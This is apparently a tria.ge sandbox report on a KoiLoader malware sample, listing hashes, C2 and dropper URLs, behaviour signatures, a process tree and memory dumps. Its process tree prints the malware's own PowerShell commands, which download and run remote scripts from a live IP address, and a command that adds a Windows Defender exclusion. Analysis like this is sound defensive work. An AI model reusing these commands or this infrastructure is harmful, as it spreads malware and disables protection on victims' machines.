Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

e29d2bd946...19.exe

windows7-x64

7

e29d2bd946...19.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    98s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/11/2024, 03:21

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe

  • Size

    2.2MB

  • MD5

    5cb042f9877f5876a19c86ded15fb1f8

  • SHA1

    12249b4e9e8f5a3d66259d9172f8b6d4225812ab

  • SHA256

    e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819

  • SHA512

    f6c4c9198de1d3a18815db38e50f36f7f73103a050f07c73ad83e05371a7a13be985a84c437ce27a74638d96fffda1eb860fa3b7923e47d020a3912cecd3f490

  • SSDEEP

    49152:FBuZrEUcH4ytTJpIbxrvfqKIy029s4C1eH9K:jkLcH4ytItfgt29s4C1eH9K

Score
10/10
koiloaderdiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://79.124.78.109/wp-includes/phyllopodan7V7GD.php
exe.dropper

http://79.124.78.109/wp-includes/barasinghaby.ps1

Extracted

Family

koiloader

C2

http://79.124.78.109/flocking.php

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 1 IoCs
    loader
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe
    "C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Users\Admin\AppData\Local\Temp\is-8S7QB.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8S7QB.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp" /SL5="$8029E,1414311,832512,C:\Users\Admin\AppData\Local\Temp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:320
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe" -command IWR -UseBasicParsing -Uri 'http://79.124.78.109/wp-includes/neocolonialXAW.php' -OutFile ($env:temp+'\vqPM0l4stR.js'); wscript ($env:temp+'\vqPM0l4stR.js');
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3228
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2692
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'http://79.124.78.109/wp-includes/phyllopodan7V7GD.php'; $l2 = 'http://79.124.78.109/wp-includes/barasinghaby.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z8IWGWWVNMV'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3976
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'http://79.124.78.109/wp-includes/sd2.ps1')
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3100
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3816
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3504
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4128
  • C:\Windows\System32\wscript.exe
    C:\Windows\System32\wscript.exe "C:\ProgramData\r423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3r.js"
    1⤵
      PID:3364
    • C:\Windows\System32\wscript.exe
      C:\Windows\System32\wscript.exe "C:\ProgramData\r423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3r.js"
      1⤵
        PID:4116

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        3d086a433708053f9bf9523e1d87a4e8

        SHA1

        b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

        SHA256

        6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

        SHA512

        931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        420B

        MD5

        1b9ba97d604d5c3480706db052a7abd9

        SHA1

        422e1cce641c713b830110e1dc6d550c030d87a0

        SHA256

        1c5d6db4d880445791b9983f0826de1c4720776a670ca15bb527f4c93d45fab7

        SHA512

        9f685353d73c462bb387e7f09a4fccfbe91b65aa4a2026089656ae4d36927b2acf412ecf477d5e97b1dcdf932eca502f5cf997b279b916edf1faafcf492b5ae8

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        0f6a3762a04bbb03336fb66a040afb97

        SHA1

        0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

        SHA256

        36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

        SHA512

        cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hdmr2fgz.2eo.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\is-8S7QB.tmp\e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819.tmp
        Filesize

        3.1MB

        MD5

        75ff4b69506691689c816c05782e97e7

        SHA1

        232ca459d1a83d8794ee30c96422a77739a57ad4

        SHA256

        f5416883c1a43a0b96e48c1da17d38c586f8d6a9b7d9978845e119df4c98f76f

        SHA512

        3c0e0d41d899f19933aabc0a8f86ce9b9c4d1ea6bdac74f07ee95792be6bcbb7b9b4ce0c2fe148024077a28287b742971ad788f5c08b3e90d47099e1664b06bc

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\vqPM0l4stR.js
        Filesize

        1KB

        MD5

        6b99a6fb6c5e9457e130ea67228f825f

        SHA1

        30d89060b5f9ee665ab4ba5f645a8a560703e613

        SHA256

        0a2f7577b81d9c87cb18acf5c022bbd5e811863427796481669d0413ed602b5d

        SHA512

        7098afed5a19afd16801e2e22f49414d33bf605004a91fa3d9a7c1a7fb0722b20e48833166101ba9aa899dc9bfc991eb02078d927d1cb6696a8967c1b0f4f70d

        Download Submit

      • memory/320-6-0x0000000000400000-0x000000000071C000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/320-10-0x0000000000400000-0x000000000071C000-memory.dmp

        Filesize

        3.1MB

        Download

      • memory/3100-98-0x00000000086B0000-0x0000000008C54000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/3100-100-0x00000000079E0000-0x0000000007A30000-memory.dmp

        Filesize

        320KB

        Download

      • memory/3100-101-0x00000000081A0000-0x0000000008232000-memory.dmp

        Filesize

        584KB

        Download

      • memory/3100-99-0x0000000004FB0000-0x0000000004FCA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/3100-97-0x00000000077F0000-0x0000000007812000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3228-25-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3228-30-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3228-24-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3228-14-0x0000012F96D70000-0x0000012F96D92000-memory.dmp

        Filesize

        136KB

        Download

      • memory/3228-13-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3468-0-0x0000000000400000-0x00000000004D8000-memory.dmp

        Filesize

        864KB

        Download

      • memory/3468-12-0x0000000000400000-0x00000000004D8000-memory.dmp

        Filesize

        864KB

        Download

      • memory/3468-2-0x0000000000401000-0x00000000004B7000-memory.dmp

        Filesize

        728KB

        Download

      • memory/4128-91-0x0000000007BE0000-0x0000000007BEE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/4128-90-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4128-94-0x0000000007CD0000-0x0000000007CD8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4128-93-0x0000000007CF0000-0x0000000007D0A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/4128-92-0x0000000007BF0000-0x0000000007C04000-memory.dmp

        Filesize

        80KB

        Download

      • memory/4128-67-0x00000000706E0000-0x000000007072C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/4128-66-0x0000000007840000-0x0000000007872000-memory.dmp

        Filesize

        200KB

        Download

      • memory/4128-77-0x0000000007800000-0x000000000781E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4128-78-0x0000000007880000-0x0000000007923000-memory.dmp

        Filesize

        652KB

        Download

      • memory/4128-88-0x0000000007A20000-0x0000000007A2A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4128-89-0x0000000007C30000-0x0000000007CC6000-memory.dmp

        Filesize

        600KB

        Download

      • memory/5112-50-0x00000000061D0000-0x00000000061EA000-memory.dmp

        Filesize

        104KB

        Download

      • memory/5112-49-0x0000000005E10000-0x0000000005E5C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/5112-53-0x00000000073A0000-0x00000000073AD000-memory.dmp

        Filesize

        52KB

        Download

      • memory/5112-52-0x00000000072C0000-0x00000000072C1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/5112-51-0x0000000007420000-0x0000000007A9A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/5112-48-0x0000000005DD0000-0x0000000005DEE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/5112-46-0x00000000057C0000-0x0000000005B14000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/5112-36-0x0000000005710000-0x0000000005776000-memory.dmp

        Filesize

        408KB

        Download

      • memory/5112-35-0x0000000004FC0000-0x0000000005026000-memory.dmp

        Filesize

        408KB

        Download

      • memory/5112-34-0x0000000004F20000-0x0000000004F42000-memory.dmp

        Filesize

        136KB

        Download

      • memory/5112-33-0x0000000005030000-0x0000000005658000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/5112-32-0x0000000004850000-0x0000000004886000-memory.dmp

        Filesize

        216KB

        Download